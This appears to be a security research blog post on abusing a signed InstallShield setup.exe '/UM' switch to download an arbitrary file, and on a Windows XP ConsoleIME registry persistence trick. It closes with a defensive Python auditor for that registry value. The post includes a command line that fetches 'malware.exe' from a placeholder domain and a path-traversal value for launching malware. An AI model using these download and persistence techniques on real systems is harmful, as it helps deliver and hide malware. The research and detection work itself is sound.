Using signed Installshield installers as downloaders

Most modern InstallShield setup programs are wrappers around an MSI package. The task of launching the installation wizard is delegated to a setup.exe stub that is embedded in the file.

The stub accepts command line arguments shown below:

  • /L – language ID
  • /S – hide the initialization dialog
  • /V – parameters passed to MsiExec.exe
  • /UA[url to InstMsiA.exe]
  • /UW[url to InstMsiW.exe]
  • /UM[url to msi package]
  • /US[url to IsScript.msi]

Not all setup.exe files I tested accept all these arguments, or perhaps I didn’t know how to use them properly. It’s actually a bit of a mess — this file [PDF warning] lists many InstallShield command line arguments, and while it covers many versions of the program, many of these switches require a lot of trial and error, and most won’t work. You can either try your luck or, better yet, reverse a particular version of the InstallShield stub. In any case… sometimes we may get lucky – as I was with the /UM[URL] command line argument, which I successfully tested on an older InstallShield installer for ACDSee software (from 2010).

Running the following command makes the setup program download a file of your choice and place it in a %TEMP%\_is-<random> folder on the system:

setup.exe /umhxxp://www.[somedomain].com/malware.exe /s

The command uses “/S” to hide most of the GUI. Most, because once your file is downloaded and setup recognizes that it is not a valid MSI, you will see this dialog box:

Its presence has its pros and cons. It’s good, because it pauses the setup program for a moment. Bad, because a GUI is visible. When this dialog pops up, your .exe is already in the %TEMP%\_is-<random> directory and can be fetched from there. Once you click OK, all files in that temporary folder are deleted.

Not the most elegant solution for downloading files, but well… it’s just yet another option.

Beyond good ol’ Run key, Part 106

This persistence trick is of historical value only (at least as far as I can tell). It only works on old Windows XP, and only on systems with an IME (e.g. Chinese).

On these systems, when a console window is created, kernel32.dll reads the following Registry entry:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\ConsoleIME

It then fetches the string stored there. If the entry is not present, the default string ‘conime.exe’ is assumed.

The conime.exe, or its replacement, is then launched.

In the demo below, I run a test on Chinese Windows XP, where I set the value to calc.exe. You can’t specify a full path – the system prepends the value with a path referring to its system directory (e.g. c:\windows\system32\). Of course, we can always use the parent directory trick to run any file from any location on the system (e.g. ..\..\test\malware.exe will run c:\test\malware.exe).
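To audit the ConsoleIME value on a forensic image or in a registry export, the check below mimics the lookup described above (value appended to the system directory, `..` components collapsed) and flags anything that is not the default conime.exe inside system32. This is an added example, not code from the original post; the system directory `C:\Windows\System32` and the sample values are constructed assumptions.

```python
import ntpath  # Windows path semantics regardless of the host OS

# Assumed system directory the loader prepends (from the post: e.g. c:\windows\system32\).
SYSTEM_DIR = r"C:\Windows\System32"
DEFAULT_IME = "conime.exe"  # default kernel32 assumes when the entry is absent
KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\ConsoleIME"


def resolve_console_ime(value, system_dir=SYSTEM_DIR):
    """Resolve the value the way the post describes the system doing it:
    missing entry -> conime.exe; otherwise system_dir + value, with any
    '..' components collapsed so we see the file that would really run."""
    name = value if value else DEFAULT_IME
    return ntpath.normpath(ntpath.join(system_dir, name))


def audit_console_ime(value, system_dir=SYSTEM_DIR):
    """Return a list of findings for one ConsoleIME value (empty == normal)."""
    findings = []
    if value is None:
        return findings  # absent entry: default behaviour, nothing to flag
    resolved = resolve_console_ime(value, system_dir)
    # Parent-directory traversal is the only way to escape system32 here.
    if ".." in value.replace("/", "\\").split("\\"):
        findings.append("parent-directory traversal in value")
    if ntpath.dirname(resolved).lower() != system_dir.lower():
        findings.append(f"resolves outside system directory: {resolved}")
    if ntpath.basename(resolved).lower() != DEFAULT_IME:
        findings.append(f"non-default executable: {ntpath.basename(resolved)}")
    return findings


if __name__ == "__main__":
    # Constructed sample values as they might appear in a registry export.
    samples = [None, "conime.exe", "calc.exe", r"..\..\test\malware.exe"]
    for sample in samples:
        print(f"{KEY} = {sample!r}")
        for finding in audit_console_ime(sample) or ["ok"]:
            print(f"    {finding}")
```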